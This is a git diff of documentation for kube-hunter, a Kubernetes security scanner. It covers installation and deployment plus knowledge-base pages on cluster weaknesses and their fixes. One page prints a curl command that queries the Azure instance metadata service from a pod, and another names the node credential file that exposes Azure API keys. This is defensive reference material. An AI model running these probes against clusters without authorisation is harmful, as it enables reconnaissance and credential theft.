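For example, to send a JSON report to your own HTTP collector (the URL below is a placeholder for your endpoint):
~~~
export KUBEHUNTER_HTTP_DISPATCH_URL=https://reports.example.com/kube-hunter
export KUBEHUNTER_HTTP_DISPATCH_METHOD=POST
kube-hunter --report json --dispatch http
~~~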
## Deployment
There are three methods for deploying kube-hunter:
### On Machine
You can run kube-hunter directly on your machine.
#### Prerequisites
You will need the following installed:
* python 3.x
* pip
##### Install with pip
Install:
~~~
pip install kube-hunter
~~~
Run:
~~~
kube-hunter
~~~
##### Run from source
Clone the repository:
~~~
git clone https://github.com/aquasecurity/kube-hunter.git
~~~
Install module dependencies. (You may prefer to do this within a [Virtual Environment](https://packaging.python.org/guides/installing-using-pip-and-virtual-environments/))
~~~
cd ./kube-hunter
pip install -r requirements.txt
~~~
Run:
~~~
python3 kube_hunter
~~~
_If you want to use pyinstaller/py2exe, you first need to run the install_imports.py script._
### Container
Aqua Security maintains a containerized version of kube-hunter at `aquasec/kube-hunter`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
The Dockerfile in this repository allows you to build a containerized version without the reporting plugin.
If you run the kube-hunter container with the host network, it will be able to probe all the interfaces on the host:
`docker run -it --rm --network host aquasec/kube-hunter`
_Note for Docker for Mac/Windows:_ Be aware that the "host" for Docker for Mac or Windows is the VM that Docker runs containers within. Therefore specifying `--network host` allows kube-hunter access to the network interfaces of that VM, rather than those of your machine.
By default, kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above, e.g.:
`docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24`
### Pod
This option lets you explore what running a malicious container can do or discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.
The example `job.yaml` file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings. (You may wish to modify this definition, for example to run as a non-root user, or to run in a different namespace.)
* Run the job with `kubectl create -f ./job.yaml`
* Find the pod name with `kubectl describe job kube-hunter`
* View the test results with `kubectl logs <pod name>`
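For reference, a minimal Job definition along the lines of the repository's `job.yaml` looks roughly like this (the image tag and backoff settings can be adjusted to taste):
~~~
apiVersion: batch/v1
kind: Job
metadata:
  name: kube-hunter
spec:
  template:
    spec:
      containers:
        - name: kube-hunter
          image: aquasec/kube-hunter
          command: ["kube-hunter"]
          args: ["--pod"]
      restartPolicy: Never
  backoffLimit: 4
~~~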
## Contribution
To read the contribution guidelines, see [CONTRIBUTING.md](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
## License
This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE).

docs/.gitignore vendored Normal file

@@ -0,0 +1 @@
_site

docs/Gemfile Normal file

@@ -0,0 +1,3 @@
source 'https://rubygems.org'
gem 'github-pages', group: :jekyll_plugins
gem 'jekyll-sitemap'

docs/Gemfile.lock Normal file

@@ -0,0 +1,250 @@
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.11.1)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.7.0)
public_suffix (>= 2.0.2, < 5.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.5)
dnsruby (1.61.3)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.17.0)
multipart-post (>= 1.2, < 3)
ffi (1.11.1)
forwardable-extended (2.6.0)
gemoji (3.0.1)
github-pages (201)
activesupport (= 4.2.11.1)
github-pages-health-check (= 1.16.1)
jekyll (= 3.8.5)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.6)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.12.1)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.6.0)
jekyll-remote-theme (= 0.4.0)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.2)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.10.4, < 2.0)
rouge (= 3.11.0)
terminal-table (~> 1.4)
github-pages-health-check (1.16.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 3.0)
typhoeus (~> 1.3)
html-pipeline (2.12.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.8.5)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.3.1)
commonmarker (~> 0.14)
jekyll (>= 3.7, < 5.0)
jekyll-commonmark-ghpages (0.1.6)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1.2)
rouge (>= 2.0, < 4.0)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.12.1)
jekyll (~> 3.4)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.6.0)
jekyll (~> 3.3)
jekyll-remote-theme (0.4.0)
addressable (~> 2.0)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.2.1)
listen (~> 3.0)
jemoji (0.10.2)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.12.2)
multipart-post (2.1.1)
nokogiri (1.10.8)
mini_portile2 (~> 2.4.0)
octokit (4.14.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (3.1.1)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (3.11.0)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (2.0.0)
safe_yaml (1.0.5)
sass (3.7.4)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.2)
addressable (>= 2.3.5)
faraday (> 0.8, < 2.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.6.0)
PLATFORMS
ruby
DEPENDENCIES
github-pages
jekyll-sitemap
BUNDLED WITH
1.17.2

docs/_config.yml Normal file

@@ -0,0 +1,19 @@
title: kube-hunter
description: Kube-hunter hunts for security weaknesses in Kubernetes clusters
logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/master/kube-hunter.png
show_downloads: false
google_analytics: UA-63272154-1
theme: jekyll-theme-minimal
collections:
kb:
output: true
defaults:
-
scope:
path: "" # an empty string here means all files in the project
values:
layout: "default"
url: "https://aquasecurity.github.io/kube-hunter"
plugins:
- jekyll-sitemap

docs/_kb/KHV002.md Normal file

@@ -0,0 +1,21 @@
---
vid: KHV002
title: Kubernetes version disclosure
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The fact that your infrastructure is running Kubernetes, and the specific version of Kubernetes in use, is publicly available and could be used by an attacker to target your environment with vulnerabilities known to affect that version.
This information could have been obtained from the Kubernetes API `/version` endpoint, or from the Kubelet's `/metrics` debug endpoint.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV003.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV003
title: Azure Metadata Exposure
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Microsoft Azure provides an internal HTTP endpoint that exposes information from the cloud platform to workloads running in a VM. The endpoint is accessible to every workload running in the VM. An attacker that is able to execute a pod in the cluster may be able to query the metadata service and discover additional information about the environment.
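For illustration, a process inside a pod on an Azure node can typically query the metadata service with a plain HTTP request (IMDS requires the `Metadata: true` header; the api-version shown is one of several accepted values):
~~~
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2019-06-01"
~~~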
## Remediation
Consider using AAD Pod Identity. A Microsoft project that allows scoping the identity of workloads to Kubernetes Pods instead of VMs (instances).
## References
- [Azure Instance Metadata service](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service)
- [AAD Pod Identity](https://github.com/Azure/aad-pod-identity#demo)

docs/_kb/KHV004.md Normal file

@@ -0,0 +1,24 @@
---
vid: KHV004
title: Azure SPN Exposure
categories: [Identity Theft]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Kubernetes has native integration with Microsoft Azure, for that a Kubernetes installation on Azure will require API access to manage the cluster's resources in Azure (for example, to create a cloud load balancer). Some installations of Kubernetes on Azure rely on a shared file on the node that contains credentials to the Azure API under `/etc/kubernetes/azure.json`. A Pod with access to this file may become a gateway for an attacker to control your Azure environment.
## Remediation
The better solution would be to use Azure Managed Identities instead of a static SPN. However, this functionality is not yet mature, and is currently available only in alpha stage for aks-engine (non-managed Kubernetes).
You can update or rotate the cluster SPN credentials, in order to prevent leaked credentials from persisting over time.
## References
- [Service principals with Azure Kubernetes Service (AKS)](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/aks/kubernetes-service-principal.md)
- [What is managed identities for Azure resources?](https://docs.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/overview)
- [aks-engine Features - Managed Identity](https://github.com/Azure/aks-engine/blob/master/docs/topics/features.md#managed-identity)
- [Update or rotate the credentials for a service principal in Azure Kubernetes Service (AKS)](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/aks/update-credentials.md)

docs/_kb/KHV005.md Normal file

@@ -0,0 +1,24 @@
---
vid: KHV005
title: Access to Kubernetes API
categories: [Information Disclosure, Unauthenticated Access]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The Kubernetes API was accessed with the Pod's Service Account, or without authentication (see the report message for details).
## Remediation
Secure access to your Kubernetes API.
It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principle.
Consider opting out of automatic mounting of the SA token using `automountServiceAccountToken: false` on the `ServiceAccount` resource or in `Pod.spec`.
## References
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)

docs/_kb/KHV006.md Normal file

@@ -0,0 +1,23 @@
---
vid: KHV006
title: Insecure (HTTP) access to Kubernetes API
categories: [Unauthenticated Access]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The API Server port is accessible over plain HTTP, and is therefore unencrypted and potentially insecure.
## Remediation
Ensure your setup is exposing kube-api only on an HTTPS port.
Do not enable kube-api's `--insecure-port` flag in production.
## References
- [API Server Ports and IPs](https://kubernetes.io/docs/reference/access-authn-authz/controlling-access/#api-server-ports-and-ips)
- [kube-apiserver command reference](https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/)

docs/_kb/KHV007.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV007
title: Specific Access to Kubernetes API
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
kube-hunter was able to perform the action specified by the reported vulnerability (check the report for more information). This may or may not be a problem, depending on your cluster setup and preferences.
## Remediation
Review the RBAC permissions to Kubernetes API server for the anonymous and default service account.
## References
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})

docs/_kb/KHV020.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV020
title: Possible Arp Spoof
categories: [Identity Theft]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
When basic (but common) container networking is used in the cluster, containers on the same host are bridged together to form a virtual layer 2 network, a setup that is common in Kubernetes installations. What is also common in Kubernetes installations is that the `NET_RAW` capability is granted to Pods, allowing them low-level access to network interactions. By pairing these two issues, a malicious Pod running on the cluster could abuse the ARP protocol (used to discover a MAC address by IP) to spoof the IP address of another pod on the same node, making other pods on the node talk to the attacker's Pod instead of the legitimate one.
## Remediation
Consider dropping the `NET_RAW` capability from your pods using `Pod.spec.securityContext.capabilities`
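A minimal sketch of such a Pod spec (the container name and image are placeholders):
~~~
apiVersion: v1
kind: Pod
metadata:
  name: no-arp-spoof
spec:
  containers:
    - name: app
      image: example/app
      securityContext:
        capabilities:
          drop: ["NET_RAW"]   # removes the low-level network access used for ARP spoofing
~~~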
## References
- [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
- [Configure a Security Context for a Pod or Container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)

docs/_kb/KHV021.md Normal file

@@ -0,0 +1,15 @@
---
vid: KHV021
title: Certificate Includes Email Address
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The Kubernetes API Server advertises a public certificate for TLS. This certificate includes an email address, which may give an attacker additional information about your organization, or be abused for further email-based attacks.
## Remediation
Do not include an email address in the Kubernetes API server certificate. (You should continue to use certificates to secure the API Server!)
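To check what your own API server certificate discloses, you can inspect it with standard `openssl` tooling (replace the host with your API server's address):
~~~
echo | openssl s_client -connect kube-api.example.com:6443 2>/dev/null \
  | openssl x509 -noout -text | grep -i email
~~~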

docs/_kb/KHV022.md Normal file

@@ -0,0 +1,19 @@
---
vid: KHV022
title: Critical Privilege Escalation CVE
categories: [Privilege Escalation]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The cluster was found to be vulnerable to CVE-2018-1002105. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [Severe Privilege Escalation Vulnerability in Kubernetes (CVE-2018-1002105)](https://blog.aquasec.com/kubernetes-security-cve-2018-1002105)

docs/_kb/KHV023.md Normal file

@@ -0,0 +1,19 @@
---
vid: KHV023
title: Denial of Service to Kubernetes API Server
categories: [Denial Of Service]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The cluster was found to be vulnerable to CVE-2019-1002100. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [Kubernetes API Server Patch DoS Vulnerability (CVE-2019-1002100)](https://blog.aquasec.com/kubernetes-vulnerability-cve-2019-1002100)

docs/_kb/KHV024.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV024
title: Possible Ping Flood Attack
categories: [Denial Of Service]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The cluster was found to be vulnerable to CVE-2019-9512. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [HTTP/2 Denial of Service Advisory](https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md)
- [CVE-2019-9512](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9512)

docs/_kb/KHV025.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV025
title: Possible Reset Flood Attack
categories: [Denial Of Service]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The cluster was found to be vulnerable to CVE-2019-9514. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [HTTP/2 Denial of Service Advisory](https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md)
- [CVE-2019-9514](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9514)

docs/_kb/KHV026.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV026
title: Arbitrary Access To Cluster Scoped Resources
categories: [Privilege Escalation]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The cluster was found to be vulnerable to CVE-2019-11247. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [CVE-2019-11247: API server allows access to custom resources via wrong scope](https://github.com/kubernetes/kubernetes/issues/80983)
- [CVE-2019-11247](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11247)

docs/_kb/KHV027.md Normal file

@@ -0,0 +1,19 @@
---
vid: KHV027
title: Kubectl Vulnerable To CVE-2019-11246
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
kubectl was found to be vulnerable to CVE-2019-11246. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [CVE-2019-11246: Another kubectl Path Traversal Vulnerability Disclosed](https://blog.aquasec.com/kubernetes-security-kubectl-cve-2019-11246)

docs/_kb/KHV028.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV028
title: Kubectl Vulnerable To CVE-2019-1002101
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
kubectl was found to be vulnerable to CVE-2019-1002101. Please see the Vulnerability description for additional information.
## Remediation
Please see the Vulnerability description for remediation.
## References
- [CVE-2019-1002101](https://nvd.nist.gov/vuln/detail/CVE-2019-1002101)
- [Another kubectl Path Traversal Vulnerability Disclosed](https://blog.aquasec.com/kubernetes-security-kubectl-cve-2019-11246)

docs/_kb/KHV029.md Normal file

@@ -0,0 +1,15 @@
---
vid: KHV029
title: Dashboard Exposed
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An open Kubernetes Dashboard was detected. The Kubernetes Dashboard can be used by an attacker to learn about the cluster and potentially to create new resources.
## Remediation
Do not leave the Dashboard unsecured.

docs/_kb/KHV030.md Normal file

@@ -0,0 +1,23 @@
---
vid: KHV030
title: Possible DNS Spoof
categories: [Identity Theft]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Your Kubernetes DNS setup is vulnerable to spoofing attacks which impersonate your DNS for malicious purposes.
In this case the exploited vulnerability was ARP spoofing, but other methods could be used as well.
## Remediation
Consider using DNS over TLS. CoreDNS (the common DNS server for Kubernetes) supports this out of the box, but your client applications might not.
## References
- [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
- [KHV020 - Possible Arp Spoof]({{ site.baseurl }}{% link _kb/KHV020.md %})
- [CoreDNS DNS over TLS](https://coredns.io/manual/toc/#specifying-a-protocol)
- [DNS over TLS spec](https://tools.ietf.org/html/rfc7858)

docs/_kb/KHV031.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV031
title: Etcd Remote Write Access Event
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Etcd (Kubernetes' Database) is writable without authentication. This gives full control of your Kubernetes cluster to an attacker with access to etcd.
## Remediation
Ensure your etcd is accepting connections only from the Kubernetes API, using the `--trusted-ca-file` etcd flag. This is usually done by the installer or cloud platform.
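As a flag-level sketch (the certificate paths are placeholders, and in most setups the installer manages these flags):
~~~
etcd --client-cert-auth \
     --trusted-ca-file=/etc/etcd/ca.crt \
     --cert-file=/etc/etcd/server.crt \
     --key-file=/etc/etcd/server.key
~~~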
## References
- [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
- [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)

docs/_kb/KHV032.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV032
title: Etcd Remote Read Access Event
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Etcd (Kubernetes' Database) is accessible without authentication. This exposes the entire state of your Kubernetes cluster to the reader.
## Remediation
Ensure your etcd is accepting connections only from the Kubernetes API, using the `--trusted-ca-file` etcd flag. This is usually done by the installer or cloud platform.
## References
- [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
- [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)

docs/_kb/KHV033.md Normal file

@@ -0,0 +1,12 @@
---
vid: KHV033
title: Etcd Remote version disclosure
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The fact that your infrastructure is running etcd, and the specific version of etcd in use, is publicly available and could be used by an attacker to target your environment with vulnerabilities known to affect that version.

docs/_kb/KHV034.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV034
title: Etcd is accessible using insecure connection (HTTP)
categories: [Unauthenticated Access]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The etcd server (Kubernetes' database) port is accessible over plain HTTP, and is therefore unencrypted and potentially insecure.
## Remediation
Ensure your setup is exposing etcd only on an HTTPS port by using the etcd flags `--key-file` and `--cert-file`.
## References
- [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
- [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)

docs/_kb/KHV036.md Normal file

@@ -0,0 +1,19 @@
---
vid: KHV036
title: Anonymous Authentication
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTP API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
## Remediation
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
## References
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)

docs/_kb/KHV037.md Normal file

@@ -0,0 +1,21 @@
---
vid: KHV037
title: Exposed Container Logs
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is leaking container logs via the `/containerLogs` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV038.md Normal file

@@ -0,0 +1,21 @@
---
vid: KHV038
title: Exposed Running Pods
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is leaking information about running pods via the `/runningpods` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV039.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV039
title: Exposed Exec On Container
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could run arbitrary commands on a container via the kubelet's `/exec` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV040.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV040
title: Exposed Run Inside Container
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could run arbitrary commands on a container via the kubelet's `/run` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV041.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV041
title: Exposed Port Forward
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could read and write data from a pod via the kubelet's `/portForward` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV042.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV042
title: Exposed Attaching To Container
categories: [Remote Code Execution]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could attach to a running container via a websocket on the kubelet's `/attach` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV043.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV043
title: Cluster Health Disclosure
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is leaking its health information, which may contain sensitive details, via the `/healthz` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
